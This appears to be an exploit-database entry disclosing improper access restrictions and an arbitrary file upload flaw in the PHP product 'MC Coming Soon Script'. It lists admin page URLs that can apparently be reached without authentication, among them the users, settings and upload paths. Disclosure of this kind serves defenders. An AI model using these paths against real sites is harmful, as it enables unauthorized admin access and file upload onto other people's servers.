MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions Vulnerabilities

2017-01-16T00:00:00
ID 1337DAY-ID-26692
Type zdt
Reporter Ihsan Sencan
Modified 2017-01-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # # # # # 
# Vulnerability: Improper Access Restrictions
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Coming Soon Script
# Script Buy Now: http://microcode.ws/product/mc-coming-soon-php-script/3880
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# 
# http://localhost/[PATH]/admin/slider.php
# file.php upload 
# http://localhost/[PATH]/admin/imageslider/file.php
# 
# http://localhost/[PATH]/admin/launch_time.php
# http://localhost/[PATH]/admin/launch_message.php
# http://localhost/[PATH]/admin/send_message.php
# http://localhost/[PATH]/admin/subscribers.php
# http://localhost/[PATH]/admin/settings.php
# http://localhost/[PATH]/admin/users.php
# Vs.......
# # # # #

#  0day.today [2018-04-01]  #